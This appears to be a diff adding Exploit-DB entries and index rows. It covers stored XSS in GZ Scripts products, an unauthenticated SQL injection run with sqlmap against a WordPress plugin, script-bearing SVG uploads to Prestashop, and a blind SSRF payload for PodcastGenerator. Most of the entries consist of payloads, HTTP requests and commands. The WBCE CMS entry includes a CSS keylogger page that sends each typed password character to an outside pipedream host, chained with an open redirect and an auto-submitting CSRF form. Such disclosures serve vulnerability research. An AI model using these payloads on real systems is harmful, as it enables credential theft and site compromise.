 3. Inject your [XSS Payload] in "Topic Title "
 4. Inject your [XSS Payload] in "Topic Message"
 5. Submit
 4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on
 5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard)
 6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
--- a/exploits/php/webapps/51560.txt
+++ b/exploits/php/webapps/51560.txt
@ -0,0 +1,24 @@
 # Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
 # Date: 30/06/2023
 # Exploit Author: Matin nouriyan (matitanium)
 # Version: <= 1.0.4
 # CVE: CVE-2022-4297
 Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
 # Tested on: Kali linux
 ---------------------------------------
 The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
 and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
 leading to an unauthenticated SQL injection
 --------------------------------------
 How to Reproduce this Vulnerability:
 1. Install WP AutoComplete <= 1.0.4
 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
 3. Find requests belong to WP AutoComplete like step 5
 4. Start sqlmap and exploit
 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
--- a/exploits/php/webapps/51562.txt
+++ b/exploits/php/webapps/51562.txt
@ -0,0 +1,34 @@
 # Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
 # Date: 30/06/2023
 # Exploit Author: CraCkEr
 # Vendor: GZ Scripts
 # Vendor Homepage: https://gzscripts.com/
 # Software Link: https://gzscripts.com/vacation-rental-website.html
 # Version: 1.8
 # Tested on: Windows 10 Pro
 # Impact: Manipulate the content of the site
 ## Stored XSS
 ------------------------------------------------------------
 POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1
 property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
 ------------------------------------------------------------
 POST parameter 'username' is vulnerable to XSS
 POST parameter 'title' is vulnerable to XSS
 POST parameter 'comment' is vulnerable to XSS
 ## Steps to Reproduce:
 1. Surf (as Guest) - Go to any Listed Property
 2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
 3. Inject your [XSS Payload] in "Username"
 4. Inject your [XSS Payload] in "Title"
 5. Inject your [XSS Payload] in "Comment"
 6. Submit
 7. XSS Fired on Local Browser
 8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]
 Note: I think Administration Panel missing a section to Manage [Reviews] on the website
 this feature must be added in next Updates [View/Edit/Delete]
--- a/exploits/php/webapps/51563.txt
+++ b/exploits/php/webapps/51563.txt
@ -0,0 +1,79 @@
 Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)
 Application: prestashop
 Version: 8.0.4
 Bugs:  Stored XSS
 Technology: PHP
 Vendor URL: https://prestashop.com/
 Software Link: https://prestashop.com/prestashop-edition-basic/
 Date of found: 30.06.2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps:
 1. Go to Catalog => Products
 2. Select arbitary product
 2. upload malicious svg file
 svg file content ===>
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 poc request:
 POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1
 Host: localhost
 Content-Length: 756
 sec-ch-ua:
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
 Accept: application/json
 Cache-Control: no-cache
 X-Requested-With: XMLHttpRequest
 sec-ch-ua-platform: ""
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55
 Connection: close
 ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
 Content-Disposition: form-data; name="path"
 ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
 Content-Disposition: form-data; name="path_thumb"
 ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ
 Content-Disposition: form-data; name="file"; filename="malas.svg"
 Content-Type: image/svg+xml
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
--- a/exploits/php/webapps/51565.txt
+++ b/exploits/php/webapps/51565.txt
@ -0,0 +1,118 @@
 #Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
 #Application: PodcastGenerator
 #Version: v3.2.9
 #Bugs:  Blind SSRF via XML Injection
 #Technology: PHP
 #Vendor URL: https://podcastgenerator.net/
 #Software Link: https://github.com/PodcastGenerator/PodcastGenerator
 #Date of found: 01-07-2023
 #Author: Mirabbas Ağalarov
 #Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps:
 1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
 2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'
 payload:  test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
 By the way i used localhost.If you have domain, you can use domain.
 3.And upload episodes
 4. I am listening on port 3132 because I'm observating for incoming requests
 nc -lvp 3132
 5. And I receive request
 request:
 POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
 Host: localhost
 Content-Length: 101563
 Cache-Control: max-age=0
 sec-ch-ua:
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: ""
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3
 Connection: close
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"
 Content-Type: image/jpeg
 image content blaaahblahasdfjblaaah;sdfblaaahasdf
 asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="title"
 test
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="shortdesc"
 test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="date"
 2023-07-01
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="time"
 17:02
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="episodecover"; filename=""
 Content-Type: application/octet-stream
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="longdesc"
 test
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="episodenum"
 33
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="seasonnum"
 33
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="itunesKeywords"
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="explicit"
 no
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="authorname"
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="authoremail"
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="customtags"
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q
 Content-Disposition: form-data; name="token"
 vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz
 ------WebKitFormBoundarypRUTcUa48pmEcI6Q--
--- a/exploits/php/webapps/51566.txt
+++ b/exploits/php/webapps/51566.txt
@ -0,0 +1,239 @@
 Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
 Version: 1.6.1
 Bugs:  Open Redirect + CSRF = CSS KEYLOGGING
 Technology: PHP
 Vendor URL: https://wbce-cms.org/
 Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
 Date of found: 03-07-2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 1. Login to Account
 2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
 3. Then you upload html file .(html file content is as below)
 '''
 <html>
    <head>
        <title>
            Login
        </title>
        <style>
            input[type="password"][value*="q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/q');}
            input[type="password"][value*="w"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/w');}
            input[type="password"][value*="e"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/e');}
            input[type="password"][value*="r"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/r');}
            input[type="password"][value*="t"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/t');}
            input[type="password"][value*="y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/y');}
            input[type="password"][value*="u"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/u');}
            input[type="password"][value*="i"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/i');}
            input[type="password"][value*="o"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/o');}
            input[type="password"][value*="p"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/p');}
            input[type="password"][value*="a"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/a');}
            input[type="password"][value*="s"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/s');}
            input[type="password"][value*="d"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/d');}
            input[type="password"][value*="f"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/f');}
            input[type="password"][value*="g"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/g');}
            input[type="password"][value*="h"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/h');}
            input[type="password"][value*="j"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/j');}
            input[type="password"][value*="k"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/k');}
            input[type="password"][value*="l"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/l');}
            input[type="password"][value*="z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/z');}
            input[type="password"][value*="x"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/x');}
            input[type="password"][value*="c"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/c');}
            input[type="password"][value*="v"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/v');}
            input[type="password"][value*="b"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/b');}
            input[type="password"][value*="n"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/n');}
            input[type="password"][value*="m"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/m');}
            input[type="password"][value*="Q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
            input[type="password"][value*="W"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/W');}
            input[type="password"][value*="E"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/E');}
            input[type="password"][value*="R"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/R');}
            input[type="password"][value*="T"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/T');}
            input[type="password"][value*="Y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
            input[type="password"][value*="U"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/U');}
            input[type="password"][value*="I"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/I');}
            input[type="password"][value*="O"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/O');}
            input[type="password"][value*="P"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/P');}
            input[type="password"][value*="A"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/A');}
            input[type="password"][value*="S"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/S');}
            input[type="password"][value*="D"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/D');}
            input[type="password"][value*="F"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/F');}
            input[type="password"][value*="G"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/G');}
            input[type="password"][value*="H"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/H');}
            input[type="password"][value*="J"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/J');}
            input[type="password"][value*="K"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/K');}
            input[type="password"][value*="L"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/L');}
            input[type="password"][value*="Z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
            input[type="password"][value*="X"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/X');}
            input[type="password"][value*="C"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/C');}
            input[type="password"][value*="V"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/V');}
            input[type="password"][value*="B"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/B');}
            input[type="password"][value*="N"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/N');}
            input[type="password"][value*="M"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/M');}
            input[type="password"][value*="1"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/1');}
            input[type="password"][value*="2"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/2');}
            input[type="password"][value*="3"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/3');}
            input[type="password"][value*="4"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/4');}
            input[type="password"][value*="5"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/5');}
            input[type="password"][value*="6"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/6');}
            input[type="password"][value*="7"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/7');}
            input[type="password"][value*="8"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/8');}
            input[type="password"][value*="9"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/9');}
            input[type="password"][value*="0"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/0');}
            input[type="password"][value*="-"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/-');}
            input[type="password"][value*="."]{
            background-image: url('https://enflownwx6she.x.pipedream.net/.');}
            input[type="password"][value*="_"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
            input[type="password"][value*="@"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
            input[type="password"][value*="?"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
            input[type="password"][value*=">"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
            input[type="password"][value*="<"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
            input[type="password"][value*="="]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
            input[type="password"][value*=":"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
            input[type="password"][value*=";"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
        </style>
    </head>
 <body>
    <label>Please enter username and password</label>
    <br><br>
    Password:: <input type="password" />
    <script>
        document.querySelector('input').addEventListener('keyup', (evt)=>{
        evt.target.setAttribute('value', evt.target.value);
        })
   </script>
 </body>
 </html>
 '''
 4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
 5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)
 POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
 Host: localhost
 Content-Length: 160
 Cache-Control: max-age=0
 sec-ch-ua:
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: ""
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
 Connection: close
 url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
 6.If write as (https://ATTACKER.com) in url parameter on abowe request on  you redirect to attacker.com.
 7.We write to html files url
 url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
 8.And create csrf-poc with csrf.poc.generator
 <html>
  <title>
    This CSRF was found by miri
  </title>
  <body>
    <h1>
      CSRF POC
    </h1>
    <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
 </html>
 9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.
 Poc video : https://youtu.be/m-x_rYXTP9E
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3216,6 +3216,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24866,exploits/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service",2013-03-22,LiquidWorm,dos,hardware,,2013-03-22,2013-03-22,0,OSVDB-91581,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
 38483,exploits/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,dos,hardware,,2013-04-19,2015-10-18,1,,,,,,https://www.securityfocus.com/bid/59325/info
 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,,2018-07-20,2018-07-20,0,CVE-2018-14336,,,,,
 51561,exploits/hardware/dos/51561.py,"TP-Link TL-WR940N V4 - Buffer OverFlow",2023-07-03,"Amirhossein Bahramizadeh",dos,hardware,,2023-07-03,2023-07-03,0,CVE-2023-36355,,,,,
 45168,exploits/hardware/dos/45168.txt,"TP-Link Wireless N Router WR840N - Denial of Service (PoC)",2018-08-08,"Aniket Dinda",dos,hardware,80,2018-08-08,2018-08-08,0,,"Denial of Service (DoS)",,,,
 45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,80,2018-08-16,2018-08-17,0,CVE-2018-15172,"Denial of Service (DoS)",,,,
 26802,exploits/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,dos,hardware,,2013-07-13,2013-07-13,0,CVE-2013-2784;OSVDB-94940,,,,,
@ -4179,6 +4180,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 26664,exploits/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,webapps,hardware,,2013-07-07,2013-07-07,0,OSVDB-94924,,,,,http://www.s3cur1ty.de/advisories
 34206,exploits/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,webapps,hardware,80,2014-07-30,2014-07-30,0,OSVDB-109787;OSVDB-109786;OSVDB-109785,,,,,
 45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware,,2018-11-12,2018-11-13,0,,"Server-Side Request Forgery (SSRF)",,,,
 51556,exploits/hardware/webapps/51556.txt,"D-Link DAP-1325 - Broken Access Control",2023-07-03,ieduardogoncalves,webapps,hardware,,2023-07-03,2023-07-03,0,,,,,,
 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,"Cross-Site Scripting (XSS)",,,,
 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80,2018-07-24,2018-07-25,0,,Traversal,,,,
 24442,exploits/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",webapps,hardware,,2013-01-31,2013-01-31,0,OSVDB-89697,,,,,
@ -5381,6 +5383,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43008,exploits/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,remote,java,,2017-10-17,2017-10-17,1,CVE-2017-12617,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/cfaa34d2a4b688780cd21fa3a48deaa56698c52e/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
 35211,exploits/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,remote,java,8001,2014-11-10,2014-11-10,1,CVE-2014-8516;OSVDB-114127,"Metasploit Framework (MSF)",,,,
 30514,exploits/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,webapps,java,,2007-08-21,2013-12-26,1,CVE-2007-4479;OSVDB-37097,,,,,https://www.securityfocus.com/bid/25391/info
 51564,exploits/java/webapps/51564.txt,"Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)",2023-07-03,tmrswrr,webapps,java,,2023-07-03,2023-07-03,0,,,,,,
 29918,exploits/java/webapps/29918.txt,"Ametys CMS 3.5.2 - 'lang' XPath Injection",2013-11-30,LiquidWorm,webapps,java,,2013-12-01,2013-12-01,0,OSVDB-100486,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php
 50692,exploits/java/webapps/50692.txt,"Ametys CMS v4.4.1 - Cross Site Scripting (XSS)",2022-02-02,Vulnerability-Lab,webapps,java,,2022-02-02,2022-02-02,0,,,,,,
 44262,exploits/java/webapps/44262.txt,"antMan 0.9.0c - Authentication Bypass",2018-03-07,"Joshua Bowser",webapps,java,3000,2018-03-07,2018-03-07,0,CVE-2018-7739,,,,,
@ -11018,6 +11021,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info
 21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,,
 40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,,
 51555,exploits/multiple/remote/51555.txt,"Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)",2023-07-03,nu11secur1ty,remote,multiple,,2023-07-03,2023-07-03,0,CVE-2023-33137,,,,,
 51552,exploits/multiple/remote/51552.txt,"Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)",2023-07-03,nu11secur1ty,remote,multiple,,2023-07-03,2023-07-03,0,CVE-2023-28285,,,,,
 51328,exploits/multiple/remote/51328.txt,"Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,remote,multiple,,2023-04-08,2023-04-08,0,CVE-2023-23399,,,,,
 19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info
 19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950
@ -11784,6 +11789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
